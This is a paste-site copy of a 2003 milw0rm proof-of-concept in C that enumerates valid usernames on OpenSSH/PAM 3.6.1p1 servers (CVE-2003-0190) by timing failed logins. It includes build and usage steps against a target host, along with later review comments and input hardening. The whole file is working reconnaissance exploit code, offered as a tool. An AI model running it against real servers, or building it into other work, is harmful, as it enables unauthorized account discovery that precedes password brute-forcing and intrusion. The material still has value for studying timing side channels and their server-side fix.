FlyFar

OpenSSH/PAM 3.6.1p1 - Remote Users Discovery Tool - CVE-2003-0190

Jan 27th, 2024
  1. /*
  2. * SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
  3. * Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved
  4. *
  5. *
  6. * Vulnerability discovered by Marco Ivaldi <raptor@mediaservice.net>
  7. * Proof of concept code by Maurizio Agazzini <inode@mediaservice.net>
  8. *
  9. * Tested against Red Hat, Mandrake, and Debian GNU/Linux.
  10. *
  11. * Reference: http://lab.mediaservice.net/advisory/2003-01-openssh.txt
  12. *
  13. * $ tar xvfz openssh-3.6.1p1.tar.gz
  14. * $ patch -p0 <openssh-3.6.1p1_brute.diff
  15. * patching file openssh-3.6.1p1/ssh.c
  16. * patching file openssh-3.6.1p1/sshconnect.c
  17. * patching file openssh-3.6.1p1/sshconnect1.c
  18. * patching file openssh-3.6.1p1/sshconnect2.c
  19. * $ cd openssh-3.6.1p1
  20. * $ ./configure
  21. * $ make
  22. * $ cc ../ssh_brute.c -o ssh_brute
  23. * $ ./ssh_brute 1 list.txt 192.168.0.66
  24. */
  25.  
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>
  #include <sys/wait.h>
  29.  
  30. /* an illegal user */
  31. #define NO_USER "not_val_user"
  32.  
  33. /* path of the patched ssh */
  34. #define PATH_SSH "./ssh"
  35.  
  36. /* max time range for invalid user */
  37. #define TIME_RANGE 3
  38.  
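  /*
   * Return nonzero when `s` is non-empty, does not begin with '-', and holds
   * only letters, digits, '.', '_', ':' and '-'.
   *
   * The command line below is handed to system(), i.e. to the shell, so any
   * other character in the host argument or in a user-file entry would be
   * interpreted by the shell instead of being passed to the client. A leading
   * '-' is refused because the token would be read as an option.
   */
  static int is_plain_token(const char *s)
  {
      static const char allowed[] =
          "abcdefghijklmnopqrstuvwxyz"
          "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
          "0123456789._:-";

      if (s[0] == '\0' || s[0] == '-')
          return 0;
      return s[strspn(s, allowed)] == '\0';
  }

  /*
   * Run `cmd` through system() and return the child's exit status, or -1 when
   * the command could not be started or did not terminate normally.
   *
   * WEXITSTATUS() is only meaningful after WIFEXITED() is true; the original
   * code applied it unconditionally.
   */
  static int run_probe(const char *cmd)
  {
      int ret = system(cmd);

      if (ret == -1 || !WIFEXITED(ret))
          return -1;
      return WEXITSTATUS(ret);
  }

  /*
   * Entry point: <protocol version> <user file> <host>.
   *
   * Runs PATH_SSH once per candidate login and treats the exit status of that
   * program as a duration in seconds (it is printed with that unit). Three
   * runs with NO_USER are averaged into a baseline; a candidate whose value
   * exceeds baseline + TIME_RANGE on two consecutive runs is reported as
   * "USER OK", anything else as "ILLEGAL".
   *
   * PATH_SSH is a relative path, so whatever "./ssh" is in the current
   * directory gets executed. The patch that makes the client return a timing
   * value is not part of this file.
   *
   * NOTE(review): the classification rests entirely on a response-time gap
   * between existing and non-existing accounts. Presumably the server-side
   * control is to make authentication failures take the same time whether or
   * not the account exists -- confirm against the advisory referenced in the
   * file header.
   *
   * Exits with 0 on completion and with -1 on bad arguments, an unreadable
   * user file, or a client that cannot be run.
   */
  int main(int argc, char *argv[])
  {
      FILE *in;
      char buffer[2000], username[100], *host, *end;
      int time_non_valid = 0, time_user = 0;
      int i, n, next;
      long version;

      fprintf(stderr, "\n SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool\n");
      fprintf(stderr, " Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved\n");

      /* argv[3] is read below, so three arguments are required (was argc < 3). */
      if (argc < 4) {
          fprintf(stderr, "\n Usage: %s <protocol version> <user file> <host>\n\n", argv[0]);
          exit(-1);
      }

      /* The value becomes a "-<n>" option; accept only protocol 1 or 2. */
      version = strtol(argv[1], &end, 10);
      if (end == argv[1] || *end != '\0' || (version != 1 && version != 2)) {
          fprintf(stderr, "\n Invalid protocol version: %s\n", argv[1]);
          exit(-1);
      }

      host = argv[3];
      if (!is_plain_token(host)) {
          fprintf(stderr, "\n Invalid host: %s\n", host);
          exit(-1);
      }

      if ((in = fopen(argv[2], "r")) == NULL) {
          fprintf(stderr, "\n Can't open %s\n", argv[2]);
          exit(-1);
      }

      /* test an illegal user */
      printf("\n Testing an illegal user\t: ");
      fflush(stdout);

      /* Bounded formatting: host is caller-controlled and buffer is fixed. */
      n = snprintf(buffer, sizeof buffer, "%s -%ld %s@%s", PATH_SSH, version, NO_USER, host);
      if (n < 0 || (size_t)n >= sizeof buffer) {
          fprintf(stderr, "\n Command line too long\n");
          fclose(in);
          exit(-1);
      }

      for (i = 0; i < 3; i++) {
          time_user = run_probe(buffer);
          if (time_user < 0) {
              fprintf(stderr, "\n Can't run %s\n", PATH_SSH);
              fclose(in);
              exit(-1);
          }
          time_non_valid += time_user;
      }

      time_non_valid /= 3;

      printf("%d second(s)\n\n", time_non_valid);

      time_non_valid += TIME_RANGE;

      /*
       * test supplied users
       *
       * Looping on the fscanf() result (instead of feof()) also handles a
       * final entry without a trailing newline, and the %99s width keeps the
       * read inside username[100].
       */
      while (fscanf(in, "%99s", username) == 1) {

          /* An entry that filled the buffer may have been cut; peek to check. */
          next = getc(in);
          if (next != EOF)
              ungetc(next, in);
          if (next != EOF && strchr(" \t\n\v\f\r", next) == NULL) {
              fprintf(stderr, " Skipping over-long entry %s...\n", username);
              /* Discard the rest of the token; the result is irrelevant. */
              if (fscanf(in, "%*[^ \t\n\v\f\r]") == EOF)
                  break;
              continue;
          }

          if (!is_plain_token(username)) {
              fprintf(stderr, " Skipping entry with unsupported characters\n");
              continue;
          }

          printf(" Testing login %s\t", username);

          if (strlen(username) <= 8)
              printf("\t");
          printf(": ");

          fflush(stdout);

          n = snprintf(buffer, sizeof buffer, "%s -%ld %s@%s", PATH_SSH, version, username, host);
          if (n < 0 || (size_t)n >= sizeof buffer) {
              fprintf(stderr, "command line too long, skipped\n");
              continue;
          }

          time_user = run_probe(buffer);
          if (time_user < 0) {
              fprintf(stderr, "can't run %s\n", PATH_SSH);
              continue;
          }

          /* \033 is the portable spelling of the ESC byte that \E produced. */
          if (time_user <= time_non_valid) {
              printf("\033[31m\033[1mILLEGAL\033[m\t[%d second(s)]\n", time_user);
              continue;
          }

          /* valid user? test it again to be sure */
          time_user = run_probe(buffer);
          if (time_user < 0) {
              fprintf(stderr, "can't run %s\n", PATH_SSH);
              continue;
          }

          if (time_user <= time_non_valid)
              printf("\033[31m\033[1mILLEGAL\033[m\t[%d second(s)] [2 test]\n", time_user);
          else
              printf("\033[32m\033[1mUSER OK\033[m\t[%d second(s)]\n", time_user);
      }

      fclose(in);

      printf("\n");

      exit(0);
  }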
  119.  
  120.  
  121.  
  122. // milw0rm.com [2003-04-30]
  123.            